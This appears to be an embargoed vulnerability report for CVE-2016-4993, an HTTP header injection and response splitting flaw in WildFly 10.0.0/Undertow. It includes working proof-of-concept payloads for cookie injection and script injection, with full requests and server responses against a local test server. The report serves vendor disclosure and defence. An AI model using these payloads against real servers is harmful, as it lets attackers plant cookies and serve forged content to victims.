EMBARGOED CVE-2016-4993 wildfly: HTTP header injection / response splitting

NOTE: The following discussion mentions Spring specifically however one can exploit using jsp. Internal RH testing was based on the following jsp <% if (request.getParameter("WELCOME") == null) { out.println("Please enter the welcome string"); } else { out.println("Hello <b>"+request. getParameter("WELCOME")+"</b>!"); } %> With the following payload http://localhost:8080/Test1.war/?WELCOME=language=en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C ! Now the specific report: ======================== WildFly/Undertow vulnerable to HTTP header injection/Response Splitting ----------------------------------------------------------------------- The WildFly 10.0.0 Application Server/Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also Response Splitting, due to insufficient sanitisation and validation of user input before the input is used as part of a HTTP header value. The PoC described below was derived from code at: http://www.mkyong.com/spring-mvc/spring-mvc-internationalization-example . [Open URL] The code was packaged as a .war file (apart from Jetty) and hosted directly on the following servlet engines for comparison: Jetty 9.2.11.v20150529 Tomcat 8.0.35 WildFly 10.0.0.Final The pom.xml file used in the actual PoC is shown at the bottom of this document Systems affected: ----------------- WildFly AS 10.0.0.Final / Undertow 1.3.15.Final Host machine: ------------- Linux ubuntu 3.16.0-71-generic #92~14.04.1-Ubuntu SMP Thu May 12 23:31:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux DISTRIB_ID=Ubuntu DISTRIB_RELEASE=14.04 DISTRIB_CODENAME=trusty DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS" Description ----------- Using a simple Spring MVC web application as a PoC (original here: http://www.mkyong.com/spring-mvc/spring-mvc-internationalization-example ), [Open URL] it was observed that the WildFly Application Server/Undertow does not sanitise or strip newline characters before using them as part of a HTTP header. This behavior is in contrast to other JSP servlet engines tested with the same PoC code (currently Jetty 9.2.11.v20150529 and Tomcat 8.0.35), where the newline characters are removed and it is not possible to split or inject headers. In the case of the PoC the org.springframework.web.servlet.i18n.LocaleChangeInterceptor is used to set a header value to that of a user supplied input, to determine the language of the page and the correct internationalization message to display. Using newline characters injected into the HTTP headers, it is possible for the malicious user to add arbitrary headers such as Set-Cookie to set arbitrary cookies, or potentially use a Location header for an open-redirect. By using two newline characters the attacker can 'split' the response (HTTP Response Splitting) and provide their own content that will be rendered to the victim user. Payloads: --------- Set-Cookie payload - en%0ASet-Cookie:MyCookieValue GET http://127.0.0.1:8888/SpringMVC/welcome.htm?language=en%0ASet-Cookie:MyCookieValue [Open URL] HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9, / ;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: JSESSIONID=jMNTfT-G_4QIwx8keYJtrFfmskg_Y6-lgQVuBlCx.ubuntu; __utma=96992031.883573134.1464252632.1464252632.1464252632.1; __utmz=96992031.1464252632.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) Connection: keep-alive Host: 127.0.0.1:8888 HTTP/1.1 200 OK Connection: keep-alive X-Powered-By: Undertow/1 X-Powered-By: JSP/2.3 Server: WildFly/10 Content-Type: text/html;charset=UTF-8 Content-Length: 290 Content-Language: en set-cookie: mycookievalue- Date: Fri, 03 Jun 2016 15:44:10 GMT Response Splitting payload - en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!-- GET http://127.0.0.1:8888/SpringMVC/welcome.htm?language=en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!-- [Open URL] HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9, / ;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: mycookievalue-; JSESSIONID=jMNTfT-G_4QIwx8keYJtrFfmskg_Y6-lgQVuBlCx.ubuntu; __utma=96992031.883573134.1464252632.1464252632.1464252632.1; __utmz=96992031.1464252632.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) Connection: keep-alive Host: 127.0.0.1:8888 HTTP/1.1 200 OK Connection: keep-alive X-Powered-By: Undertow/1 X-Powered-By: JSP/2.3 Server: WildFly/10 Content-Type: text/html;charset=UTF-8 Content-Length: 341 Content-Language: en